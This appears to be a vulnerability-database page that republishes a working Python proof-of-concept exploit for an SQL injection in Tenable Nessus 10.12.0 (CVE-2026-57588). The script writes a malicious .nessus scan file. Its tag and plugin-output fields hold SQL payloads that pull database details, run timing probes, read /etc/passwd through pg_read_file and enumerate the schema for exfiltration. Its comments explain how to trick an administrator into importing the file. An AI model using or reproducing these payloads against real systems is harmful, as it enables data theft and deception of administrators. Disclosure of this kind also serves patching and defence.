Lucene search
K

šŸ“„ Tenable Nessus 10.12.0 SQL Injection

šŸ—“ļøĀ 07 Jul 2026Ā 00:00:00Reported byĀ Mohammed Idrees BanyamerTypeĀ 
packetstorm
Ā packetstorm
šŸ”—Ā packetstorm.newsšŸ‘Ā 8Ā Views

SQL injection in Tenable Nessus 10.12.0 via malicious nessus file imports enables data exfiltration.

Related
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2026-57588
25 Jun 202613:47
–attackerkb
Circl
CVE-2026-57588
26 Jun 202614:40
–circl
CVE
CVE-2026-57588
25 Jun 202613:47
–cve
Cvelist
CVE-2026-57588 SQL Injection in Nessus via Malicious Scan Result File Import
25 Jun 202613:47
–cvelist
Exploit DB
Tenable Nessus 10.12.1 - SQL Injection
7 Jul 202600:00
–exploitdb
EUVD
EUVD-2026-39409
25 Jun 202613:47
–euvd
Tenable Nessus
Tenable Nessus < 10.12.1 Multiple Vulnerabilities (TNS-2026-17)
26 Jun 202600:00
–nessus
NVD
CVE-2026-57588
25 Jun 202615:16
–nvd
Positive Technologies
PT-2026-52459
25 Jun 202600:00
–ptsecurity
Vulnrichment
CVE-2026-57588 SQL Injection in Nessus via Malicious Scan Result File Import
25 Jun 202613:47
–vulnrichment
Rows per page
# Exploit Title:    Tenable Nessus 10.12.1 - SQL Injection 
    # CVE:                  CVE-2026-57588
    # Date:                 2026-06-26
    # Exploit Author:       Mohammed Idrees Banyamer
    # Author Country:       Jordan
    # Instagram:            @banyamer_security
    # Author GitHub:        https://github.com/mbanyamer
    # Author Blog  :        https://banyamersecurity.com/blog/
    # Vendor Homepage:      https://www.tenable.com
    # Software Link:        https://www.tenable.com/downloads/nessus
    # Affected:             Nessus 10.12.0 and prior
    # Tested on:            Nessus 10.12.0
    # Category:             Remote
    # Platform:             Linux / Windows
    # Exploit Type:         SQL Injection
    # CVSS:                 4.3 (Medium)
    # Description:          A SQL injection vulnerability exists in Tenable Nessus when importing malicious scan result files (.nessus XML). 
    #                       Successful exploitation allows data exfiltration from the backend database by a privileged user.
    # Fixed in:             Nessus 10.12.1 and later
    # Usage:
    #   python3 exploit.py -o malicious.nessus
    #
    # Examples:
    #   python3 exploit.py
    #   python3 exploit.py --output poc.nessus
    #
    # Options:
    #   -o, --output     Output filename for the malicious .nessus file
    #
    # Notes:
    #   • This is a Proof of Concept. Requires social engineering to trick a privileged user into importing the file.
    #   • Works best against PostgreSQL backend (default in Nessus).
    #
    # How to Use
    #
    # Step 1:
    #   Generate the malicious file using this script.
    #
    # Step 2:
    #   Deliver the .nessus file to a Nessus administrator and have them import it via the web interface.
    
    def banner():
        print(r"""
    ā•”ā–ˆā–ˆā–ˆā–ˆā–ˆā–ˆā•—  ā–ˆā–ˆā–ˆā–ˆā–ˆā•— ā–ˆā–ˆā–ˆā•—   ā–ˆā–ˆā•—ā–ˆā–ˆā•—   ā–ˆā–ˆā•— ā–ˆā–ˆā–ˆā–ˆā–ˆā•— ā–ˆā–ˆā–ˆā•—   ā–ˆā–ˆā–ˆā•—ā–ˆā–ˆā–ˆā–ˆā–ˆā–ˆā–ˆā•—ā–ˆā–ˆā–ˆā–ˆā–ˆā–ˆā•—ā•—
    ā•‘ā–ˆā–ˆā•”ā•ā•ā–ˆā–ˆā•—ā–ˆā–ˆā•”ā•ā•ā–ˆā–ˆā•—ā–ˆā–ˆā–ˆā–ˆā•—  ā–ˆā–ˆā•‘ā•šā–ˆā–ˆā•— ā–ˆā–ˆā•”ā•ā–ˆā–ˆā•”ā•ā•ā–ˆā–ˆā•—ā–ˆā–ˆā–ˆā–ˆā•— ā–ˆā–ˆā–ˆā–ˆā•‘ā–ˆā–ˆā•”ā•ā•ā•ā•ā•ā–ˆā–ˆā•”ā•ā•ā–ˆā–ˆā•‘
    ā•‘ā–ˆā–ˆā–ˆā–ˆā–ˆā–ˆā•”ā•ā–ˆā–ˆā–ˆā–ˆā–ˆā–ˆā–ˆā•‘ā–ˆā–ˆā•”ā–ˆā–ˆā•— ā–ˆā–ˆā•‘ ā•šā–ˆā–ˆā–ˆā–ˆā•”ā• ā–ˆā–ˆā–ˆā–ˆā–ˆā–ˆā–ˆā•‘ā–ˆā–ˆā•”ā–ˆā–ˆā–ˆā–ˆā•”ā–ˆā–ˆā•‘ā–ˆā–ˆā–ˆā–ˆā–ˆā•—  ā–ˆā–ˆā–ˆā–ˆā–ˆā–ˆā•”ā•
    ā•‘ā–ˆā–ˆā•”ā•ā•ā–ˆā–ˆā•—ā–ˆā–ˆā•”ā•ā•ā–ˆā–ˆā•‘ā–ˆā–ˆā•‘ā•šā–ˆā–ˆā•—ā–ˆā–ˆā•‘  ā•šā–ˆā–ˆā•”ā•  ā–ˆā–ˆā•”ā•ā•ā–ˆā–ˆā•‘ā–ˆā–ˆā•‘ā•šā–ˆā–ˆā•”ā•ā–ˆā–ˆā•‘ā–ˆā–ˆā•”ā•ā•ā•  ā–ˆā–ˆā•”ā•ā•ā–ˆā–ˆā•—
    ā•‘ā–ˆā–ˆā–ˆā–ˆā–ˆā–ˆā•”ā•ā–ˆā–ˆā•‘  ā–ˆā–ˆā•‘ā–ˆā–ˆā•‘ ā•šā–ˆā–ˆā–ˆā–ˆā•‘   ā–ˆā–ˆā•‘   ā–ˆā–ˆā•‘  ā–ˆā–ˆā•‘ā–ˆā–ˆā•‘ ā•šā•ā• ā–ˆā–ˆā•‘ā–ˆā–ˆā–ˆā–ˆā–ˆā–ˆā–ˆā•—ā–ˆā–ˆā•‘  ā–ˆā–ˆā•‘
    ā•šā•ā•ā•ā•ā•ā• ā•šā•ā•  ā•šā•ā•ā•šā•ā•  ā•šā•ā•ā•ā•   ā•šā•ā•   ā•šā•ā•  ā•šā•ā•ā•šā•ā•     ā•šā•ā•ā•šā•ā•ā•ā•ā•ā•ā•ā•šā•ā•  ā•šā•ā•
            ╔═╗ Banyamer Security ╔═╗
    """)
    
    import argparse
    import xml.etree.ElementTree as ET
    
    def create_malicious_nessus(output_file):
        root = ET.Element("NessusClientData_v2")
        report = ET.SubElement(root, "Report")
        report.set("name", "PoC - CVE-2026-57588")
        host = ET.SubElement(report, "ReportHost")
        host.set("name", "poc-target.example.com")
        host_properties = ET.SubElement(host, "HostProperties")
        tags = [
            ("hostname", "evil-host' UNION SELECT NULL, current_database(), version(), user() -- "),
            ("os", "Linux' AND (SELECT pg_sleep(5))=0 -- "),
            ("ip", "192.168.1.1' OR '1'='1"),
            ("fqdn", "test' ; SELECT pg_read_file('/etc/passwd') -- "),
        ]
        for name, value in tags:
            tag = ET.SubElement(host_properties, "tag")
            tag.set("name", name)
            tag.text = value
        item = ET.SubElement(host, "ReportItem")
        ET.SubElement(item, "pluginID").text = "999999"
        ET.SubElement(item, "pluginName").text = "CVE-2026-57588 PoC"
        ET.SubElement(item, "port").text = "0"
        ET.SubElement(item, "protocol").text = "tcp"
        ET.SubElement(item, "severity").text = "0"
        ET.SubElement(item, "description").text = "Proof of Concept for SQL Injection"
        plugin_output = ET.SubElement(item, "plugin_output")
        plugin_output.text = """Normal output
    ' UNION ALL SELECT 
        '=== DATA EXFIL START ===',
        table_name,
        column_name,
        '=== DATA EXFIL END ==='
    FROM information_schema.columns 
    WHERE table_schema = current_schema() -- """
        tree = ET.ElementTree(root)
        with open(output_file, "wb") as f:
            tree.write(f, encoding="utf-8", xml_declaration=True)
        print(f"[+] Malicious file successfully created: {output_file}")
        print("[+] Deliver this file to a privileged Nessus user for import.")
    
    def main():
        banner()
        parser = argparse.ArgumentParser(description="CVE-2026-57588 Nessus SQLi PoC")
        parser.add_argument("-o", "--output", default="cve-2026-57588-poc.nessus", help="Output filename (default: cve-2026-57588-poc.nessus)")
        args = parser.parse_args()
        create_malicious_nessus(args.output)
    
    if __name__ == "__main__":
        main()

Data

Build on a solid foundation withĀ Vulners data

WeĀ provide theĀ essential building blocks forĀ cybersecurity solutions withĀ comprehensive, structured, andĀ constantly updated vulnerability andĀ exploits data

Api

Power your application withĀ Vulners API

The Vulners REST API offers reliable, high-performance access toĀ vulnerabilityĀ intelligence, withĀ 99.9%Ā SLAĀ uptime andĀ CDN-backed data delivery forĀ seamlessĀ global access

App

Assess and manage vulnerabilities withĀ VulnersĀ tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

07 Jul 2026 00:00Current
6Medium risk
Vulners AI Score6
CVSS 3.13.3
CVSS 44.6
EPSS0.00158
SSVC
8